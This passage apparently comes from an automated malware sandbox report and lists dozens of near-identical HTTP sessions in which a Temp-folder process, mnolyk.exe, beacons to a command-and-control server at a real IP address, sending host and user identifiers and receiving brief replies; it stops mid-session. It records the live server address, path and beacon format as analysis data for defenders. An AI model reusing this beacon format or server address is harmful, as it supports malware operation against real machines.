                                                                      226 | 192.168.2.7 | 49953 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:00.586144924 CET | 679 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:00.650333881 CET | 679 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:00 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      227 | 192.168.2.7 | 49954 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:00.821017027 CET | 680 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:00.883276939 CET | 680 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:00 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      228 | 192.168.2.7 | 49955 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:01.055368900 CET | 681 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:01.122129917 CET | 681 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:01 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      229 | 192.168.2.7 | 49956 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:01.309389114 CET | 682 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:01.375094891 CET | 682 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:01 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      23 | 192.168.2.7 | 49747 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:03.176630020 CET | 455 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:03.239852905 CET | 455 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:03 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      230 | 192.168.2.7 | 49957 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:01.557192087 CET | 683 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:01.622724056 CET | 683 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:01 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      231 | 192.168.2.7 | 49958 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:01.789882898 CET | 684 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:01.854120970 CET | 684 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:01 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      232 | 192.168.2.7 | 49959 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:02.027472973 CET | 685 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:02.092313051 CET | 685 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:02 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      233 | 192.168.2.7 | 49960 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:02.273096085 CET | 686 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:02.335052013 CET | 686 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:02 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      234 | 192.168.2.7 | 49961 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:02.522336006 CET | 687 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:02.587881088 CET | 687 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:02 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      235 | 192.168.2.7 | 49962 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:02.769565105 CET | 688 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:02.835967064 CET | 688 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:02 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      236 | 192.168.2.7 | 49963 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:03.026261091 CET | 689 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:03.091744900 CET | 689 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:03 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      237 | 192.168.2.7 | 49964 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:03.280174017 CET | 690 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:03.343910933 CET | 690 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:03 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      238 | 192.168.2.7 | 49965 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:03.533119917 CET | 691 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:03.596465111 CET | 691 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:03 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      239 | 192.168.2.7 | 49966 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:03.777401924 CET | 692 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:03.841682911 CET | 692 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:03 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      24 | 192.168.2.7 | 49748 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:03.424266100 CET | 456 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:03.489942074 CET | 456 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:03 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      240 | 192.168.2.7 | 49967 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:04.009354115 CET | 693 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:04.074354887 CET | 693 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:04 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      241 | 192.168.2.7 | 49968 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:04.244029045 CET | 694 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:04.307334900 CET | 694 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:04 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      242 | 192.168.2.7 | 49969 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:04.479000092 CET | 695 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:04.542346001 CET | 695 | IN | HTTP/1.1 200 OK
